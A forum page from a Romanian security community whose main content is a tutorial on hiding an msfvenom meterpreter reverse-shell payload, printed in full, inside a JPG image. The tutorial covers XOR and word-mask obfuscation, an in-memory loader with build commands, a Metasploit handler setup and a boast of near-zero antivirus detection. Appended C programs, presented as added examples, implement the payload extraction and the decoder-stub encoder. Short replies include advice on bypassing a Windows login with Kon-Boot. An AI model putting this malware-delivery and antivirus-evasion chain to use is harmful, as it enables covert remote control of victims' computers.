Forums

  1. General information

    1. Important announcements

      Important announcements and the forum rules. Read the rules before posting.

      7695
      posts
    2. Welcome

      Welcome to the Romanian Security Team forum; you can introduce yourself here (optional)

      17616
      posts
    3. RST projects

      Here you will find all the programs, tutorials, methods and exploits created by RST members

      4371
      posts
  2. Technical section

    1. Exploits

      The latest exploits, PoCs and shellcode

      6864
      posts
    2. Challenges

      Challenges and wargames, for CTF enthusiasts

      9608
      posts
    3. Bug Bounty

      Category for discussions about sites running a Bug Bounty program that rewards people who report vulnerabilities to them

      2026
      posts
    4. Programming

      The programmers' corner: C/C++, Visual Basic, .NET, Java, ASM, shell scripting, Perl, Python

      21855
      posts
    5. Reverse engineering & exploit development

      Tutorials on malware analysis, samples, source code, useful programs, reverse engineering and exploit development

      1474
      posts
    6. Mobile phones

      Discussions about mobile phones, rooting, jailbreaking etc.

      11748
      posts
    7. Operating systems and hardware discussions

      Discussions about hardware, Windows, Unix, BSD etc.

      7137
      posts
    8. Electronics

      General discussions about electronics

      2406
      posts
    9. Wireless Pentesting

      Wardriving area: WiFi, Bluetooth and GSM hacking

      3531
      posts
    10. 8445
      posts
  3. Tutorials

    1. Tutorials in Romanian

      Tutorials in the Romanian language

      18124
      posts
    2. Tutorials in English

      Tutorials in the English language

      5985
      posts
    3. Video tutorials

      Video tutorials

      4921
      posts
  4. Programs

    1. Hacking programs

      Post utilities such as sniffers, bruteforcers, fuzzers etc. here. Do not post requests here.

      27665
      posts
    2. Security programs

      Post programs such as firewalls, antiviruses and similar programs here

      2566
      posts
    3. Useful programs

      Programs that do not fit in the other sections (hacking or security)

      11941
      posts
    4. Free stuff

      Various useful things, excluding roots, SMTPs, VPSes etc.

      8791
      posts
  5. General discussions

    1. RST Market

      Any sale/purchase related to online/banking fraud or unauthorized access is punished with a permanent ban! Minimum 50 posts required for access!

      22496
      posts
    2. Off-topic

      Discussions on various topics that do not fit in the other categories. IT-related discussions only!

      135268
      posts
    3. Beginner discussions

      If you are a beginner, have a simple question or want to learn more about a field, this is the right section

      657
      posts
    4. Security news

      News from the IT security field

      19251
      posts
    5. Help

      Have a problem we can help with? Post it here.

      108658
      posts
    6. Requests

      Requests are made only here, regardless of subject.

      50444
      posts
    7. Suggestions

      Want a better forum? Every suggestion from you will be considered. Suggestions for the site/forum only.

      5014
      posts
    8. Links

      Post only security-related links here!

      9520
      posts
    9. Trash bin

      All topics that have drifted away from the answer will be moved here.

      44170
      posts
  • Posts

    • Addition to the one above, since they would not fit 5 on a row. The letter-spacing is there to remove the space between the inline-block elements.
    • Kon-Boot bypasses it directly or, in the worst case, lets you create a new user with administrator rights, with which you can then change the password of the original account.
    • Hello. How can I make all the elements sit on one line in CSS? I have a PHP page in which the block of HTML code containing some names etc. goes into an article tag, and the article tag belongs to a section:

        <section>
            <article>
                meamsd
                masdmas
                kaksa
            </article>
        </section>

      But article will be repeated many times, and I want each article to have a border and to be laid out 5 articles per row before wrapping to the next one. I don't know how to put them on one line with only 5 per row.
    • Can you please fix the text for those with the dark theme too? Thanks in advance.
    • We all know the internet loves cats! I was thinking of how we can combine cats and malware. Then, it struck me!

      I occasionally see a particular method of code execution which includes some executable file and an image. Usually, I will see that the program downloads the image file, converts it to a .exe and runs it. I think this method is somewhat sloppy and can be improved upon in some ways. One being that once the file touches the disk it becomes inspectable by anti-virus. To get around this, you can launch it in memory. However, you will have another problem: most viruses are executables, which means you will have to fix the IAT and other things in the executable, since it will be loaded into a shared address space with another program. The method I suggest here is that we embed shellcode into an image and have our program allocate heap space, download the image and execute the shellcode within the image. As mentioned before, it is in memory and won't be analyzed as easily. For this scenario, we will be using a .JPG file, although really anything will do.

      Things you will need:
        - Windows OS
        - Linux tools
        - Knowledge of assembly
        - Basic knowledge of msfvenom payload generation
        - A hex editor
        - GCC installed and added to $PATH (comes with Code::Blocks)
        - NASM, added to $PATH
        - Optional: OllyDbg or x64dbg
        - Some way of converting ASM instructions into opcodes; I use Ram Michael's MultiLine Ultimate Assembler plugin

      General explanation of how this is set up: since the flow of an executable always follows instructions from top to bottom, we will need to be creative in how we execute our payload in memory. When you download a file via HTTP, you get the response header followed by the file that was downloaded. Because the response is at the top and varies in size, it becomes difficult to predict where we will need to jump to execute this. So what we can do to get around this is to put our payload at the bottom of the image, then memcpy the bottom to another space on the heap and jump to it. An example of what our image should look like with the payload inserted:

        JPEG image header  → FF D8 FF E0 00 10
        JFIF ASCII         → 4A 46 49 46
        Bytes              …
        Bytes              …
        End of our payload → CC CC CC CC
        Middle of payload  → BB BB BB BB
        Start of payload   → AA AA AA AA

      We, of course, need to jump to the AA AA AA AA in the payload and therefore flip it. To do this, we memcpy it to another spot, so that it looks like this:

        Start of payload   → AA AA AA AA
        Middle of payload  → BB BB BB BB
        End of our payload → CC CC CC CC

      Once this is done, we can jump to it and execute it without a problem. For this example, I have written my own cheap obfuscator and have XOR'd the bytes, which we will XOR back, and run my code through the obfuscator. To explain in more detail, my obfuscator (LazyBitmaskEncoder) simply takes the payload, divides it into WORDs and adds FFFF to the front of each. Then it removes the FFFF (using bit-wise math), moves the WORD over to the first part of the DWORD, then moves the other WORD. So it kind of looks like this:

        mov eax, FFFFAABB ; Moves that value to EAX
        and eax, FFFF     ; Removes the FFFF in the front
        mov ebx, FFFFCCDD ; Moves that value to EBX
        mov ax, bx        ; Makes EAX look like AABBCCDD
        push eax          ; Pushes it to the stack

      In the end it adds:

        jmp esp           ; Jumps to where our payload is on the stack and executes it

      I have added some XORing parts to the encoder/decoder, but this is just for added obfuscation. If there is any confusion, please read the code; you can always paste the output it provides into a binary and see what it does for yourself.

      Let's get to work: let's start by generating a simple payload with msfvenom. Of course, you will need to change the LPORT and LHOST to meet your needs.

        msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=5555 -f c

      This is what it will output. I have bolded the IP in case you want to make a simple change to this.

        unsigned char buf[] =
        "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
        "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
        "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
        "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
        "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
        "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
        "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
        "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
        "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
        "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
        "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
        "\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x01\x02\x03\x04\x68\x02"
        "\x00\x15\xb3\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
        "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
        "\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00"
        "\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
        "\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
        "\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
        "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00"
        "\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
        "\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff"
        "\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
        "\x53\xff\xd5";

      So let's take this and pass it through my LazyBitmaskEncoder. Paste your shellcode in the "SHELLCODE GOES HERE" spot. To use this, you will need to compile it, and you can simply do this using gcc:

        gcc -std=c11 LazyBitmaskEncoder.c -o encoder.exe

      Then run it to get your output, redirecting the output to a file:

        encoder.exe > somefile.txt

      In my case, I have an extra byte, which is 31. My program warns to turn this into a NOP'd XOR byte; in this case, it was 7E. [screenshot]

      Now we just need the bytes of this. There might be a tool online that will convert assembly to bytecode, or elsewhere. I just tend to use Ram Michael's MultiLine Ultimate Assembler in OllyDbg or x64dbg to paste the instructions in as binary and then copy the bytes out. [screenshot] Then we can copy the bytes out by highlighting them and right-clicking -> Edit -> Binary Copy. Alternatively, you can simply press CTRL+INSERT. [screenshot]

      Now we need to put these bytes at the bottom of an image. If you saw the diagram at the top, we need to put them in the image in reverse order. Luckily, in Linux, this is very simple to do. Here is an image before the bytes are reversed. [screenshot] I pasted this into a file (I called mine 'moo'). We can run this command to reverse the order of the bytes:

        for i in `cat moo`; do echo $i; done | tac | sed ':a;N;$!ba;s/\n/ /g'

      Now we just need to insert them into an image for hiding. Take your favorite cat picture. I am choosing this Siamese cat for this demonstration. We will not really see the cat, as he will live in memory. Doesn't he look malicious?! [picture]

      OK. Now let's copy the shellcode into the image. We just need to open it up in a hex editor and copy the bytes into the image. The thing to remember is that we want the bytes to be at the bottom. If you do not have it exactly at the bottom, then you will need to add 0x90s until your shellcode starts. [screenshot] Here it is after we paste the bytes in. As you see, our shellcode is at the bottom of the image. Once you save this, you will see that there is some minor color distortion at the bottom of the image. [picture]

      Now for the last part. We just need to put this on a web server and make a simple program that will download the image into memory and then jump to it and execute this shellcode. The simplest way to accomplish this is in assembly. I have written a program in assembly that will do just this: GhostExe.asm. To compile this, you can simply run:

        nasm -f win32 GhostExe.asm
        gcc -fno-use-linker-plugin GhostExe.obj -o GhostExe.exe

      I recommend opening up a debugger, attaching to the process and following along, watching it in action, just so that you can learn. If you choose to debug, then at least look at the program GhostExe.exe at offset 00401482. This is right after the recv. If you look at the end of ECX, you will see where our payload is located. Otherwise just set up Metasploit properly, run the exe and let it go.

        msf> use exploit/multi/handler
        msf> set payload windows/meterpreter/reverse_tcp
        msf> set lhost <local IP>
        msf> set lport <local port>
        msf> set ExitOnSession false
        msf> exploit -j

      Here are the results from NoDistrubute.com: 1/35 is very good for something so simple. [screenshot]

      Made Kitties Malicious — Krist

      The following will be a debug shot! [screenshot] We make it down to JMP EAX: this is where we will jump into the shellcode in our cat image! [screenshot] Look familiar? [screenshot] Our original payload! [screenshot]

      #source: [link]
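The receive-and-flip step described in the post above, as an added example that is not code from the post or from GhostExe: a C sketch that builds a constructed download (an HTTP response header of arbitrary length, a minimal JPEG skeleton and a payload appended in reverse), locates the payload by scanning back from the end for the JPEG EOI marker FF D9 rather than depending on the header size, and copies it into a buffer in execution order. The function names, the marker-scan approach and the sample bytes are my own assumptions; a real loader would place the destination in memory allocated executable (VirtualAlloc with PAGE_EXECUTE_READWRITE on Windows) before jumping to it, which this example does not do.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Scan backwards for the last JPEG End-Of-Image marker (FF D9); everything
 * after it is the reversed payload. JPEG entropy-coded data byte-stuffs FF as
 * FF 00, so FF D9 otherwise appears only as an EOI (an EXIF thumbnail carries
 * its own EOI, but scanning from the end still finds the outermost one).
 * Caveat: the reversed payload itself must not contain FF D9, or the scan
 * stops early. Returns the tail length and sets *tail, or 0 if no marker. */
size_t tail_after_eoi(const uint8_t *blob, size_t len, const uint8_t **tail)
{
    for (size_t i = len; i >= 2; i--) {
        if (blob[i - 2] == 0xFF && blob[i - 1] == 0xD9) {
            *tail = blob + i;
            return len - i;
        }
    }
    *tail = NULL;
    return 0;
}

/* Copy the reversed tail into out, flipping it back into execution order
 * (AA.. first, CC.. last): the memcpy step of the post. Returns the payload
 * length, or 0 if nothing was found or out is too small. */
size_t recover_payload(const uint8_t *blob, size_t len, uint8_t *out, size_t cap)
{
    const uint8_t *tail;
    size_t n = tail_after_eoi(blob, len, &tail);
    if (n == 0 || n > cap)
        return 0;
    for (size_t i = 0; i < n; i++)
        out[i] = tail[n - 1 - i];
    return n;
}

/* Constructed stand-in for the HTTP download (assumption): a response header
 * of any length, a minimal JPEG skeleton (SOI, APP0 "JFIF", EOI), then the
 * payload appended in reverse, as in the post's diagram. */
size_t build_download(const char *hdr, const uint8_t *payload, size_t plen,
                      uint8_t *out, size_t cap)
{
    static const uint8_t jpeg[] = { 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10,
                                    'J', 'F', 'I', 'F', 0x00, 0xFF, 0xD9 };
    size_t hlen = strlen(hdr);
    if (hlen + sizeof jpeg + plen > cap)
        return 0;
    memcpy(out, hdr, hlen);
    memcpy(out + hlen, jpeg, sizeof jpeg);
    for (size_t i = 0; i < plen; i++)
        out[hlen + sizeof jpeg + i] = payload[plen - 1 - i];
    return hlen + sizeof jpeg + plen;
}

int main(void)
{
    /* constructed sample payload: the AA/BB/CC pattern from the post */
    static const uint8_t payload[] = { 0xAA, 0xAA, 0xBB, 0xBB, 0xCC, 0xCC };
    const char *headers[] = {
        "HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\n",
        "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: image/jpeg\r\n"
        "Content-Length: 19\r\n\r\n",
    };
    for (int h = 0; h < 2; h++) {
        uint8_t blob[256], out[64];
        size_t len = build_download(headers[h], payload, sizeof payload, blob, sizeof blob);
        size_t n = recover_payload(blob, len, out, sizeof out);
        printf("header %zu bytes, payload found at offset %zu:", strlen(headers[h]), len - n);
        for (size_t i = 0; i < n; i++)
            printf(" %02X", out[i]);
        printf("\n");
    }
    return 0;
}
```

Two headers of different length land the image at different offsets, yet the same payload comes back, which is the property the post relies on. If the reversed payload can contain the pair FF D9, pad it or re-encode it, since the backwards scan would stop inside it.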
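The push-to-stack decoder stub described in the post above, as an added example that is not the post's LazyBitmaskEncoder: a C encoder that emits a stub in which each payload DWORD is split into two WORDs hidden behind FFFF, recombined in a register, XORed with a key and pushed, ending in jmp esp, plus a small interpreter for exactly those opcodes so the stub's effect can be checked without running it (the "paste the output into a binary and see what it does" step). It assumes the halves are recombined with shl ebx, 16 / or eax, ebx, that a partial last DWORD is padded with 0x90, and that the last DWORD is pushed first because the stack grows down; the opcode bytes are the standard x86 encodings and the sample payload is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t rd32(const uint8_t *p)   /* little-endian DWORD read */
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32(uint8_t *p, uint32_t v) /* little-endian DWORD write */
{
    p[0] = v & 0xFF; p[1] = (v >> 8) & 0xFF; p[2] = (v >> 16) & 0xFF; p[3] = (v >> 24) & 0xFF;
}

/* Emit the decoder stub for payload: for each DWORD (last one first, so ESP
 * ends up at the first payload byte) the stub rebuilds the XORed value from two
 * FFFF-masked WORDs, removes the key and pushes it; it ends in jmp esp.
 * 0x90 pads a partial last DWORD. Returns the stub length, 0 if out is small. */
size_t encode_push_stub(const uint8_t *payload, size_t plen, uint32_t key,
                        uint8_t *out, size_t cap)
{
    size_t ndw = (plen + 3) / 4, o = 0;
    if (ndw * 26 + 2 > cap)
        return 0;
    for (size_t i = ndw; i-- > 0;) {
        uint8_t b[4] = { 0x90, 0x90, 0x90, 0x90 };
        for (size_t j = 0; j < 4 && i * 4 + j < plen; j++)
            b[j] = payload[i * 4 + j];
        uint32_t v = rd32(b) ^ key;                                        /* value the stub rebuilds */
        out[o++] = 0xB8; wr32(out + o, 0xFFFF0000u | (v & 0xFFFF)); o += 4; /* mov eax, FFFFllll */
        out[o++] = 0x25; wr32(out + o, 0x0000FFFFu); o += 4;                /* and eax, 0000FFFF */
        out[o++] = 0xBB; wr32(out + o, 0xFFFF0000u | (v >> 16)); o += 4;    /* mov ebx, FFFFhhhh */
        out[o++] = 0xC1; out[o++] = 0xE3; out[o++] = 0x10;                 /* shl ebx, 16 */
        out[o++] = 0x09; out[o++] = 0xD8;                                   /* or eax, ebx */
        out[o++] = 0x35; wr32(out + o, key); o += 4;                        /* xor eax, key */
        out[o++] = 0x50;                                                    /* push eax */
    }
    out[o++] = 0xFF; out[o++] = 0xE4;                                       /* jmp esp */
    return o;
}

/* Interpreter for just the opcodes the stub uses. Returns the bytes sitting at
 * ESP when jmp esp is reached (the decoded payload), or 0 on any other opcode. */
size_t emulate_stub(const uint8_t *s, size_t n, uint8_t *out, size_t cap)
{
    uint32_t eax = 0, ebx = 0;
    uint8_t stack[4096];
    size_t sp = sizeof stack, pc = 0;                 /* stack grows down */
    while (pc < n) {
        uint8_t op = s[pc];
        if (op == 0xB8 || op == 0xBB || op == 0x25 || op == 0x35) {   /* reg, imm32 forms */
            if (pc + 5 > n) return 0;
            uint32_t imm = rd32(s + pc + 1);
            if (op == 0xB8) eax = imm;
            else if (op == 0xBB) ebx = imm;
            else if (op == 0x25) eax &= imm;
            else eax ^= imm;
            pc += 5;
        } else if (op == 0xC1 && pc + 2 < n && s[pc + 1] == 0xE3) {   /* shl ebx, imm8 */
            ebx <<= (s[pc + 2] & 31); pc += 3;
        } else if (op == 0x09 && pc + 1 < n && s[pc + 1] == 0xD8) {   /* or eax, ebx */
            eax |= ebx; pc += 2;
        } else if (op == 0x50) {                                      /* push eax */
            if (sp < 4) return 0;
            sp -= 4; wr32(stack + sp, eax); pc += 1;
        } else if (op == 0xFF && pc + 1 < n && s[pc + 1] == 0xE4) {   /* jmp esp */
            break;
        } else {
            return 0;
        }
    }
    size_t len = sizeof stack - sp;
    if (len > cap) return 0;
    memcpy(out, stack + sp, len);
    return len;
}

int main(void)
{
    static const uint8_t payload[] = { 0xAA, 0xBB, 0xCC, 0xDD, 0xEE };  /* constructed */
    uint8_t stub[128], decoded[16];
    size_t slen = encode_push_stub(payload, sizeof payload, 0x1337C0DEu, stub, sizeof stub);
    size_t dlen = emulate_stub(stub, slen, decoded, sizeof decoded);
    printf("stub (%zu bytes):", slen);
    for (size_t i = 0; i < slen; i++) printf(" %02X", stub[i]);
    printf("\ndecoded (%zu bytes):", dlen);
    for (size_t i = 0; i < dlen; i++) printf(" %02X", decoded[i]);
    printf("\n");
    return 0;
}
```

The key and the masked WORDs stay in the clear inside the stub, so this hides byte patterns from a naive scanner and nothing more; the point of the interpreter is that a stub's effect on the stack is checked before it is ever placed in an image.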
    • Try Panama; they ask for a copy of your passport and a minimum $750 deposit. An offshore account, of course, because I know exactly what you want to do 😂😂😂